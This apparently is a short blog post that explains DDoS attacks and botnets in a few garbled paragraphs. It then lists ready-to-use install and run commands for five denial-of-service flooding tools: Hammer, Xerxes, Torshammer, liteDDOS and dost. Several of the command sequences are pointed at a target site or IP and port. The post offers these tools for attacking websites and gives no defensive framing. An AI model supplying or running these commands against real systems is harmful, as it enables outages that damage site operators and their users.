What is a DDoS?
Denial of service attack" (DDoS), the attackers aim to flood servers or computer systems with a large number of requests until they render unavailable their services and websites or that other Internet services are no longer accessible.
DDoS attacks are usually not directed against the providers, but rather against the websites hosted by the provider that must be damaged by the attack.
In DDoS attack, criminals use specific malware to infect hundreds of unprotected computers and thereby gain control over them. Several infected computers then form a botnet that internet criminals use to mass attack servers. To boycott an Intrernet site, the "captured" computers send data packets to the Web server in question until the latter no longer has the capacity to process the data and must interrupt its service.
✨ Hammer
$ pkg update
$ pkg upgrade
$ pkg install python
$ pkg install git
$ git clone https://github.com/cyweb/hammer
$ cd hammer
$ python hammer.py
$ python hammer.py -s [IP address] -p [port] -t 135
✨ Xerxes
$ apt install git
$ apt install clang
$ git clone https://github.com/zanyarjamal/xerxes
$ ls
$ cd xerxes
$ ls
$ clang xerxes.c -o xerxes
$ ls
$ ./xerxes www.site.com 80
✨ Torshammer
$ pkg update
$ pkg install git
$ apt install tor
$ pkg install python2
$ git clone https://github.com/dotfighter/torshammer.git
$ ls
$ cd torshammer
$ python2 torshammer.py
✨ liteDDOS
$ apt update
$ apt upgrade
$ pkg install git
$ pkg install python2
$ git clone https://github.com/4L13199/LITEDDOS
$ cd LITEDDOS
$ python2 liteDDOS.py
5.Ddos attack by dost
$ git clone https://github.com/verluchie/dost-attack
$ cd dost-attack
$ chmod 777 dost
$ ./install.sh
$ dost

0 comments:
Post a Comment